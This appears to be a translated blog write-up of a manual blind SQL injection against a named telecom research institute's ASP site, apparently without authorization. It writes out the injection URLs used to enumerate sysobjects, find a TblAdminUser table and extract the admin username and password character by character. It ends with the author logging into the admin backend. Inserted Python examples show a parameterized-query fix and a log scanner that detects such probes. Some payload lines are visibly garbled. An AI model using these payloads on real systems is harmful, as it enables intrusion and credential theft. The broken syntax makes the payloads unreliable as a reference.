Manual Database Injection for Website Security Detection

Source: Internet
Author: User

I. Introduction

The night drags on slowly, and I am in no mood to sleep ......

I happened to put on a rock song I heard a few years ago, "The Shadow of the Ancestors". Such a long history is a mixture of many sins and achievements; such a "splendid culture" holds too much ignorance alongside its civilization. Beautiful, for example, are Chinese characters, Go, the guzheng, Tang poetry, Song ci and fu; poor, for example, are the things people spent their whole lives on: "destroying the rebel and seizing the throne", selecting princesses, the emperor and his bureaucracy, foot-binding, eunuchs, eight-legged essays and so on.

Well, enough digression! Today let me use the old bottle of the eight-legged essay to hold new IT wine: database injection, a security technique that has been around for several years, written up in a slightly new article.

 

II. Overview

So-called database injection, that is, SQL injection, means that an attacker inserts SQL commands into the input fields of web forms or the query strings of page requests and tricks the server into executing malicious SQL commands. The official wording is: "SQL injection attacks occur when an application uses input content to construct dynamic SQL statements to access the database. They also occur when the code uses stored procedures that are passed strings containing unfiltered user input. SQL injection may allow attackers to execute commands in the database through the application. If the application connects to the database with a privileged account, the problem becomes very serious." In some forms, the content entered by users is used directly to construct (or affect) dynamic SQL commands, or as input parameters of stored procedures; such forms are particularly vulnerable to SQL injection. Many website programs do not validate user input, or handle the program's variables improperly, which creates security risks for the application. An attacker can then submit a piece of database query code (usually in the browser's address bar, over the normal web port) and, from the results the program returns, obtain sensitive information or even control the whole server; this is how SQL injection arises. Simply put, the principle of SQL injection is to submit specially crafted input from the client in order to collect information about the program and the server and obtain the information one is after.
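As an added example, not code from the original article: a Python/sqlite3 stand-in for a product page (table, data and function names constructed here) showing why the true/false probe described in this article works against string-concatenated SQL and tells nothing against a parameterized query, which is the fix for the root cause the overview names.

```python
import sqlite3

# Constructed stand-in for the site's product table (hypothetical schema).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id TEXT PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO products VALUES ('22', 'Router X100')")


def show_products_vulnerable(db, raw_id):
    """Builds the SQL by string concatenation, as the injectable page does:
    whatever arrives in ?id= becomes part of the statement text."""
    sql = "SELECT name FROM products WHERE id = '" + raw_id + "'"
    try:
        return [row[0] for row in db.execute(sql)]
    except sqlite3.Error:
        return "error"  # the 'return exception' page seen in the article


def show_products_fixed(db, raw_id):
    """Same page with a parameterized query: the input is bound as a value
    and never parsed as SQL, so it cannot change the statement's logic."""
    rows = db.execute("SELECT name FROM products WHERE id = ?", (raw_id,))
    return [row[0] for row in rows]


def boolean_probe_differs(handler, db, base_id="22"):
    """The article's detection step: send a true and a false condition and
    compare the two pages. A difference means the input reached the SQL."""
    true_page = handler(db, base_id + "' and 1=1 and '1'='1")
    false_page = handler(db, base_id + "' and 1=2 and '1'='1")
    return true_page != false_page
```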

Of course, what kind of database query code one is able to construct is the difference between a newbie and an expert. At the same time, I assure everyone that I am no master; I basically do not even use databases, so after reading this article please do not ask me too many questions, because I would not know the answers.

 

III. Detection

While searching for information, I followed a link to the website of a telecommunications technology research institute. I checked the homepage code and links and tested with and/or, found nothing, and only at the end of the day found the following page interesting.

1=1 (returns normally)

1=2 (returns abnormally)

Add a special symbol, as shown in the two screenshots (not reproduced here):

(Returns normally)

(Returns an exception)

Hey, there is an injection point, and my heart lit up!

 

IV. Cracking the Database

We can see that the backend database of this website is MS SQL Server.

 

(select count(*) from [sysobjects])>=0 (returns normally, which shows that the database is SQL Server)

Luckily, I was also able to detect the database instance name of this website; see the screenshot (not reproduced).

 

In SQL Server, DB_NAME has a maximum length of NVARCHAR(128). When I submitted an error and the website reported it, the red underline and red rectangle in the error page showed the database instance name: jstrd.

 

V. Table Searching
This was a long and painful task. When a database is created, the system automatically creates some system tables, so I constructed the following statements to test table names in the database instance jstrd.

Due to space limitations, I will only introduce one system table related to the application instance, SYSOBJECTS, and its relevant fields.

Table SYSOBJECTS holds one record for each object (constraint, rule, table, view, trigger, etc.) created in the database. The meanings of the relevant fields are:

SYSOBJECTS.name: the object name, for example a table name or view name.

SYSOBJECTS.id: the object id.

SYSOBJECTS.type: the object type (P stored procedure, V view, S system table, U user table).

 

The returned result was normal. The statement submitted, in its "system state" (URL-encoded form), was:

http://*/show_products.asp?id=22%27%20and%20%28select%20count%28%2a%29%20from%20jstrd..%5bsysobjects%5d%20where%20xtype=char%28117%29%20and%20left%28jstrd..%5bsysobjects%5d.name%2c0%29=char%2832%29%20and%20len%28jstrd..%5bsysobjects%5d.name%29%3e0%29%3e0%20and%20%27=%271%&classid=1

Translated into the "user state" that we can read easily (later statements are given in this form):

http://*/show_products.asp?id=22' and (select count(*) from jstrd..[sysobjects] where xtype=char(117) and left(jstrd..[sysobjects].name,0)=char(32) and len(jstrd..[sysobjects].name)>0 and abs(ascii(substring(jstrd..[sysobjects].name,1,1)<=67)>0 and '1'='1&classid=1

You may be wondering: what is this mess? I smiled and did not answer; the answer comes later. But one hint in advance:

xtype is a field of the sysobjects table; xtype=char(117), that is, xtype='U', selects user tables. The ASCII code of the space character is 32.
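An added example from the defender's side, not part of the original article: a small log scanner (Python, with constructed sample log lines) that first decodes the "system state" of a request back to its "user state" and then looks for the idioms used above (sysobjects, xtype=char(...), len/left/substring/ascii, the '1'='1 tautology). The indicator names and thresholds are my own choices; matching the decoded text matters because a filter that only inspects the raw percent-encoded request, or looks for the literal letter U rather than char(117), misses these probes.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the probes shown in the article (blind injection via
# MSSQL sysobjects); matched case-insensitively on the decoded query string.
INDICATORS = {
    "quote_and": re.compile(r"'\s*(?:and|or)\b", re.I),
    "tautology": re.compile(r"'1'\s*=\s*'1", re.I),
    "sysobjects": re.compile(r"\bsysobjects\b", re.I),
    "xtype_char": re.compile(r"\bxtype\s*=\s*char\s*\(", re.I),
    "char_by_char": re.compile(r"\b(?:ascii|substring|left|len)\s*\(", re.I),
}


def decode_query(uri):
    """'System state' -> 'user state': percent-decode the query string.
    Decoding twice also catches double-encoded input (%2527 -> %27 -> ')."""
    query = uri.split("?", 1)[1] if "?" in uri else ""
    return unquote_plus(unquote_plus(query))


def score_request(uri):
    """Names of the indicators present in one request's query string."""
    decoded = decode_query(uri)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))


def scan_access_log(lines, min_hits=2):
    """Returns (uri, hits) for log lines matching at least min_hits indicators;
    requiring two reduces noise from legitimate apostrophes in search terms."""
    flagged = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m and len(hits := score_request(m.group(1))) >= min_hits:
            flagged.append((m.group(1), hits))
    return flagged


# Constructed sample lines in Combined Log Format; the second carries the
# article's encoded sysobjects probe, the third a plain 1=2 probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2010:10:00:00 +0800] "GET /show_products.asp?id=22&classid=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2010:10:00:07 +0800] "GET /show_products.asp?id=22%27%20and%20%28select%20count%28%2a%29%20from%20jstrd..%5bsysobjects%5d%20where%20xtype=char%28117%29%20and%20len%28jstrd..%5bsysobjects%5d.name%29%3e0%29%3e0%20and%20%271%27=%271&classid=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2010:10:00:09 +0800] "GET /show_products.asp?id=22%27%20and%201=2%20and%20%271%27=%271&classid=1 HTTP/1.1" 500 611',
]
```

Running `scan_access_log(SAMPLE_LOG)` flags the second and third requests and leaves the ordinary product view alone; in practice the flagged source address and the run of near-identical requests with alternating 200/500 responses are the signal to investigate.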

After several failures, entering the following statement found a table that I thought was used to store user names and passwords (other tables were detected before, but I considered them useless to me. What I want to point out is that once I detected a table name beginning with TblAd, I guessed TblAdmin directly; later I found TblAdminUs, and then TblAdminUser).

 

http://*/show_products.asp?id=22' and (select count(*) from jstrd..[sysobjects] where xtype=char(117) and left(jstrd..[sysobjects].name,11)=char(84)+char(98)+char(108)+char(65)+char(100)+char(109)+char(105)+char(110)+char(85)+char(115)+char(101) and len(jstrd..[sysobjects].name)>11 and abs(ascii(substring(jstrd..[sysobjects].name,114)=)>0 and '1'='1&classid=1

We can see that there is a table named TblAdminUser, so we can test it again, for example:

 

and (select count(*) from TblAdminUser)>0

 

VI. Exploring Columns
As you can see, the above should now be fairly clear. What else do you not understand? Well, I will tell you: the website and its backend system ignore the "system state" I mentioned above, and ignore the "user state" as well. Look at the two tables below.

 

(Part of a Unicode encoding table)

 

(Part of the ASCII code table)

Having found the table, our job now is to explore its columns. Using the knowledge above, I guessed there should be two columns, username and password. See:

http://*/show_products.asp?id=22' and (select count(*) from jstrd..[TblAdminUser] where left(jstrd..[TblAdminUser].username,0)=char(32) and len(jstrd..[TblAdminUser].username)>0)>0 and '1'='1&classid=1

 

http://*/show_products.asp?id=22' and (select count(*) from jstrd..[TblAdminUser] where left(jstrd..[TblAdminUser].password,0)=char(32) and len(jstrd..[TblAdminUser].password)>0 and abs(ascii(substring(jstrd..[TblAdminUser].password,106)=)>0 and '1'='1&classid=1

 

VII. Results
The charge has sounded and victory is in sight; but, as the saying goes, "on a journey of a hundred miles, ninety is only the halfway point": the part that really needs more than half of the effort is here.

 

http://*/show_products.asp?id=22'%20and%20(select%20count(*)%20from%20jstrd..[TblAdminUser]%20where%20%20left(jstrd..[TblAdminUser].username,0)=char(32)%20and%20len(jstrd..[TblAdminUser].username)>0%20and%20abs(ascii(substring(jstrd..[TblAdminUser].username,0%)=97)>20and%20'1'='1&classid=1

It can be seen that the first character of the username column is 'a' (ASCII code 97). I soon guessed it was admin.

In the password column, the first character should come after 'g' (ASCII code 103), as shown:

 

http://*/show_products.asp?id=22' and (select count(*) from jstrd..[TblAdminUser] where left(jstrd..[TblAdminUser].password,0)=char(32) and len(jstrd..[TblAdminUser].password)>0 and abs(ascii(substring(jstrd..[TblAdminUser].password,103)>0 and '1'='1&classid=1

Soon I guessed it was 'j' (ASCII code 106), as shown:

 

http://*/show_products.asp?id=22' and (select count(*) from jstrd..[TblAdminUser] where left(jstrd..[TblAdminUser].password,0)=char(32) and len(jstrd..[TblAdminUser].password)>0 and abs(ascii(substring(jstrd..[TblAdminUser].password,106)=)>0 and '1'='1&classid=1

After a great deal of hard work, I finally found the whole password, which turned out to be *********

It was easy to find the admin backend and log on. Correct! As shown in the screenshot (not reproduced).

 

 

VIII. Conclusion
This article focuses on manual database injection, so further penetration after gaining control of the website is not described. Here I have only thrown out a brick in the hope of attracting jade. In my view, the injection succeeded thanks to the following three points:

1. Use of Unicode and ASCII encodings;

2. Use of the sysobjects table that the system creates automatically;

3. Use of the maximum length of 128 for db_name, plus some intuitive judgment.

The whole process took nearly a week of spare time. It is night again ......

Sleep
